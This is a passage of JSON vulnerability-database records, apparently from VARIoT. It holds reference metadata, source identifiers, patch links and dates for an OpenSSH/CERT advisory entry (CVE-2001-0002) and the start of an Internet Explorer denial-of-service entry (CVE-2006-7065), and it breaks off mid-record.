412-268-6989\n Postal address:\n CERT Coordination Center\n Software Engineering Institute\n Carnegie Mellon University\n Pittsburgh PA 15213-3890\n U.S.A. \n\n CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) /\n EDT(GMT-4) Monday through Friday; they are on call for emergencies\n during other hours, on U.S. holidays, and on weekends. \n\nUsing encryption\n\n We strongly urge you to encrypt sensitive information sent by email. \n Our public PGP key is available from\n http://www.cert.org/CERT_PGP.key\n\n If you prefer to use DES, please call the CERT hotline for more\n information. \n\nGetting security information\n\n CERT publications and other security information are available from\n our web site\n http://www.cert.org/\n\n To subscribe to the CERT mailing list for advisories and bulletins,\n send email to majordomo@cert.org. Please include in the body of your\n message\n\n subscribe cert-advisory\n\n * \"CERT\" and \"CERT Coordination Center\" are registered in the U.S. \n Patent and Trademark Office. \n ______________________________________________________________________\n\n NO WARRANTY\n Any material furnished by Carnegie Mellon University and the Software\n Engineering Institute is furnished on an \"as is\" basis. Carnegie\n Mellon University makes no warranties of any kind, either expressed or\n implied as to any matter including, but not limited to, warranty of\n fitness for a particular purpose or merchantability, exclusivity or\n results obtained from use of the material. Carnegie Mellon University\n does not make any warranty of any kind with respect to freedom from\n patent, trademark, or copyright infringement. \n ______________________________________________________________________\n\n Conditions for use, disclaimers, and sponsorship information\n\n Copyright \\xa92003 Carnegie Mellon University. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 6.5.8\n\niQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78\n7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT\nrb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU\nUENALuNdthA=\n=DD60\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
},
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
}
],
"trust": 5.4
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#326746",
"trust": 2.5
},
{
"db": "NVD",
"id": "CVE-2001-0002",
"trust": 2.4
},
{
"db": "CERT/CC",
"id": "VU#254236",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#483492",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "7823",
"trust": 1.6
},
{
"db": "BID",
"id": "2456",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#333628",
"trust": 1.0
},
{
"db": "SECUNIA",
"id": "10156",
"trust": 0.8
},
{
"db": "XF",
"id": "12970",
"trust": 0.8
},
{
"db": "BID",
"id": "7806",
"trust": 0.8
},
{
"db": "CERT/CC",
"id": "VU#334928",
"trust": 0.8
},
{
"db": "BID",
"id": "2633",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151",
"trust": 0.6
},
{
"db": "CERT/CC",
"id": "VU#602204",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#209807",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "31735",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#784980",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#575892",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#255484",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#865940",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#467036",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#380864",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#838572",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#422156",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#412478",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#935264",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#686224",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#104280",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#567620",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#989932",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#967668",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#435444",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#732952",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "32268",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"id": "VAR-200107-0045",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-07-04T22:18:25.097000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS01-015",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms01-015.mspx"
},
{
"title": "MS01-015",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms01-015.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-039.asp"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/326746"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=825750"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/?kbid=827363"
},
{
"trust": 1.6,
"url": "http://www.cert.org/advisories/ca-2003-19.html"
},
{
"trust": 1.6,
"url": "http://cgi.nessus.org/plugins/dump.php3?id=11835"
},
{
"trust": 1.6,
"url": "http://www.iss.net/support/product_utilities/xfrpcss.php"
},
{
"trust": 1.6,
"url": "http://www.ntbugtraq.com/dcomrpc.asp"
},
{
"trust": 1.6,
"url": "http://securecomputing.stanford.edu/alerts/win-rpc-10sept2003.html"
},
{
"trust": 1.6,
"url": "http://www.coresecurity.com/common/showdoc.php?idx=393\u0026idxseccion=10"
},
{
"trust": 1.6,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/ms01-015"
},
{
"trust": 1.6,
"url": "http://www.guninski.com/chmtempmain.html"
},
{
"trust": 1.6,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a920"
},
{
"trust": 1.6,
"url": "http://www.osvdb.org/7823"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/2456"
},
{
"trust": 1.6,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/5567"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/254236"
},
{
"trust": 0.9,
"url": "http://www.kb.cert.org/vuls/id/483492"
},
{
"trust": 0.8,
"url": "http://www.openssh.com/txt/buffer.adv"
},
{
"trust": 0.8,
"url": "http://www.mindrot.org/pipermail/openssh-unix-announce/2003-september/000062.html"
},
{
"trust": 0.8,
"url": "http://www.freebsd.org/cgi/cvsweb.cgi/ports/security/openssh/files/patch-buffer.c"
},
{
"trust": 0.8,
"url": "http://www.secunia.com/advisories/10156/"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/advisories/ad20030910.html"
},
{
"trust": 0.8,
"url": "http://www.eeye.com/html/research/tools/rpcdcom.html"
},
{
"trust": 0.8,
"url": "http://www.xfocus.org/advisories/200307/4.html"
},
{
"trust": 0.8,
"url": "http://www.nsfocus.com/english/homepage/research/0306.htm"
},
{
"trust": 0.8,
"url": "http://www.lac.co.jp/security/english/snsadv_e/68_e.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms03-032.asp"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/object.asp"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/12970"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/7806"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2001-0002"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2001-0002"
},
{
"trust": 0.8,
"url": "http://www.securityfocus.com/bid/2633"
},
{
"trust": 0.2,
"url": "http://www.cert.org/"
},
{
"trust": 0.2,
"url": "http://www.kb.cert.org/vuls/id/333628"
},
{
"trust": 0.2,
"url": "http://www.cert.org/cert_pgp.key"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/209807"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/jarl-5rfqqz."
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/602204"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/cs-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/412478"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/567620"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/104280"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/686224"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/575892"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/732952"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/989932"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/09/19/archive.html#swena"
},
{
"trust": 0.1,
"url": "http://www.cert.org/summaries/"
},
{
"trust": 0.1,
"url": "http://www.cert.org/stats/cert_stats.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/784980"
},
{
"trust": 0.1,
"url": "http://www.cert.org/training/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/838572"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/967668"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/current_activity.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-28.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-27.html"
},
{
"trust": 0.1,
"url": "https://www.cert.org/contact_cert/encryptmail.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/incident_notes/in-2003-04.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/435444"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-26.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-24.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-25.html"
},
{
"trust": 0.1,
"url": "http://www.cert.org/advisories/ca-2003-23.html"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/935264"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/467036"
},
{
"trust": 0.1,
"url": "https://www.cert.org/pgp/cert_pgp_key.asc"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/255484"
},
{
"trust": 0.1,
"url": "http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/865940"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/380864"
},
{
"trust": 0.1,
"url": "http://www.cert.org/congressional_testimony"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/422156"
},
{
"trust": 0.1,
"url": "http://www.cert.org/csirts/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "PACKETSTORM",
"id": "31735"
},
{
"db": "PACKETSTORM",
"id": "32268"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-09-16T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2003-08-26T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"date": "2003-09-29T22:44:34",
"db": "PACKETSTORM",
"id": "31735"
},
{
"date": "2003-11-25T05:25:51",
"db": "PACKETSTORM",
"id": "32268"
},
{
"date": "2001-07-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"date": "2001-07-21T04:00:00",
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "CERT/CC",
"id": "VU#333628"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#483492"
},
{
"date": "2003-09-10T00:00:00",
"db": "CERT/CC",
"id": "VU#326746"
},
{
"date": "2003-12-11T00:00:00",
"db": "CERT/CC",
"id": "VU#254236"
},
{
"date": "2005-08-11T00:00:00",
"db": "CERT/CC",
"id": "VU#334928"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"date": "2021-07-23T12:18:31.047000",
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OpenSSH contains buffer management errors",
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
}
}
VAR-200703-0270
Vulnerability from variot - Updated: 2023-12-18 13:54Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. Microsoft Internet Explorer is prone to a denial-of-service vulnerability when handling malicious HTML files. Successfully exploiting this issue allows attackers to consume excessive CPU resources in the affected browser and eventually cause Internet Explorer to crash, causing a denial-of-service
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200703-0270",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "network camera server vb101",
"scope": null,
"trust": 1.4,
"vendor": "canon",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900.2180"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800.1106"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2800"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2900"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6.0.2600"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6.0 and 7.0"
},
{
"model": "internet explorer beta3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer beta2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer beta1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "7.0"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "19364"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-003110"
},
{
"db": "NVD",
"id": "CVE-2006-7065"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windowsxp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp1:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_2000:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:windows_xp:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:microsoft_windows_server_2003_sp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_millennium:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:*:vista:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7.0:beta_2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:*:windows_server_2003:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6.0:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_98_se:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:7:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-7065"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thomas Pollet is credited with the discovery of this issue.",
"sources": [
{
"db": "BID",
"id": "19364"
},
{
"db": "CNNVD",
"id": "CNNVD-200703-042"
}
],
"trust": 0.9
},
"cve": "CVE-2006-7065",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
